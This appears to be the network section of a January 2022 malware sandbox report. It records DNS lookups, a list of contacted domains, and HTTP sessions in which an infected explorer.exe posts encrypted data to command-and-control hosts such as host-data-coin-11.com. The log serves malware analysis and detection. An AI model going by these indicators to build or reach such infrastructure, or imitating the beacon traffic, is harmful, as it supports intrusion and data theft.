Jan 9, 2022 18:48:14.739479065 CET	8.8.8.8	192.168.2.3	0x1984	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:15.550071001 CET	8.8.8.8	192.168.2.3	0xeeb5	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:16.307980061 CET	8.8.8.8	192.168.2.3	0x2c09	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:22.575756073 CET	8.8.8.8	192.168.2.3	0xa636	Server failure (2)	srtuiyhuali.at	none	none	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:23.091861010 CET	8.8.8.8	192.168.2.3	0xefc3	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:27.506659031 CET	8.8.8.8	192.168.2.3	0xfeee	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:29.995244026 CET	8.8.8.8	192.168.2.3	0xad60	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:30.949704885 CET	8.8.8.8	192.168.2.3	0xc46c	No error (0)	unic11m.top		54.38.220.85	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:31.036689043 CET	8.8.8.8	192.168.2.3	0xf683	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.390347958 CET	8.8.8.8	192.168.2.3	0x763	No error (0)	unicupload.top		54.38.220.85	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:32.451143026 CET	8.8.8.8	192.168.2.3	0x5b5f	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:38.152072906 CET	8.8.8.8	192.168.2.3	0xcf3a	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:38.979228020 CET	8.8.8.8	192.168.2.3	0x888f	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:39.757236958 CET	8.8.8.8	192.168.2.3	0x36bb	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:40.538742065 CET	8.8.8.8	192.168.2.3	0xdc59	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:41.599020004 CET	8.8.8.8	192.168.2.3	0x604d	No error (0)	privacytools-foryou-777.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:42.428658009 CET	8.8.8.8	192.168.2.3	0xc33a	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:44.669703007 CET	8.8.8.8	192.168.2.3	0x2ee	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:45.181263924 CET	8.8.8.8	192.168.2.3	0x5153	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:45.943701982 CET	8.8.8.8	192.168.2.3	0x1093	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:47.961729050 CET	8.8.8.8	192.168.2.3	0x2d79	No error (0)	data-host-coin-8.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:47.969757080 CET	8.8.8.8	192.168.2.3	0x2d79	No error (0)	data-host-coin-8.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:50.566925049 CET	8.8.8.8	192.168.2.3	0x383e	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:51.591566086 CET	8.8.8.8	192.168.2.3	0x97bc	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:52.377933979 CET	8.8.8.8	192.168.2.3	0xbeb8	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:53.149446964 CET	8.8.8.8	192.168.2.3	0x81f5	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.213160038 CET	8.8.8.8	192.168.2.3	0x9127	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:54.587234974 CET	8.8.8.8	192.168.2.3	0xbc52	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:55.029074907 CET	8.8.8.8	192.168.2.3	0x7463	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.180541992 CET	8.8.8.8	192.168.2.3	0xc20	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.180541992 CET	8.8.8.8	192.168.2.3	0xc20	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.396241903 CET	8.8.8.8	192.168.2.3	0xf690	No error (0)	bitly.com		67.199.248.14	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.396241903 CET	8.8.8.8	192.168.2.3	0xf690	No error (0)	bitly.com		67.199.248.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.686872959 CET	8.8.8.8	192.168.2.3	0x6611	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		148.0.74.229	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		138.36.3.134	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		211.119.84.112	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		88.158.247.38	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		175.126.109.15	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		211.169.6.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		61.255.185.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		187.232.210.249	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		190.166.136.241	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:56.845627069 CET	8.8.8.8	192.168.2.3	0x1187	No error (0)	amogohuigotuli.at		211.171.233.126	A (IP address)	IN (0x0001)
Jan 9, 2022 18:48:57.770612001 CET	8.8.8.8	192.168.2.3	0xacdf	No error (0)	data-host-coin-8.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:49:01.382549047 CET	8.8.8.8	192.168.2.3	0x37fa	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:49:03.026875019 CET	8.8.8.8	192.168.2.3	0x5ae6	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)
Jan 9, 2022 18:49:03.788151026 CET	8.8.8.8	192.168.2.3	0xf272	No error (0)	host-data-coin-11.com		47.251.44.201	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

185.233.81.115

cdn.discordapp.com

bit.ly

bitly.com

fxrkgvik.org

host-data-coin-11.com

gajno.org

bmfgfkjf.net

veuiviue.com

dmryaqnk.org

mckoice.com

vvsuujdwht.net

xmpxn.com

data-host-coin-8.com

xjbxvifs.net

pynrhmvhj.org

qlrgaved.com

xhqofq.org

xjnbybe.com

unicupload.top

qbhyoygecf.com

deiypnos.net

ccuaitw.org

fxnaip.com

ghsrebmie.org

gbertcn.com

wtksenbbjr.net

kyvfadndk.com

185.7.214.171:8080

qsvaicgadh.org

ykuckxuei.org

wider.net

dajmdg.org

homleb.org

riqrjly.com

irljurmqm.com

amogohuigotuli.at

pyemedcg.org

bifhr.com

unic11m.top

ejorc.com

kbxyk.com

mrwsqu.org

jxnnlwoum.org

cxbcmk.net

unhjp.net

privacytools-foryou-777.com

gckkxgv.net

ynbdlhhsfj.com

tlclh.net

xpnufbkn.net

psidp.net

bveasvok.net

qtcvnmqmix.net

xvbahlaice.com

fpwhnxup.com

iqyfefv.net

bycco.com

weihpu.net

iffgi.com

gcjoh.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49771	185.233.81.115	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49816	162.159.130.233	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49753	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:43.741322994 CET	1069	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vvsuujdwht.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: host-data-coin-11.com
Jan 9, 2022 18:47:43.741333008 CET	1070	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 32 cd a2 10 Data Ascii: i;G~CE5i[nwmFu$f]d2UxpgPLoqBI$r`qe5L-1X\|6A<$hjM}O&b+VoS%rl=NV<Hi_?GV:{RX6
Jan 9, 2022 18:47:44.302823067 CET	1070	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49754	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:44.505935907 CET	1071	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xmpxn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: host-data-coin-11.com
Jan 9, 2022 18:47:44.505949020 CET	1071	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 39 a1 88 0b Data Ascii: i;G~CE5i[nwmFu$f]d9dfwAs}#\/nI^5(+.:m]3 -U-
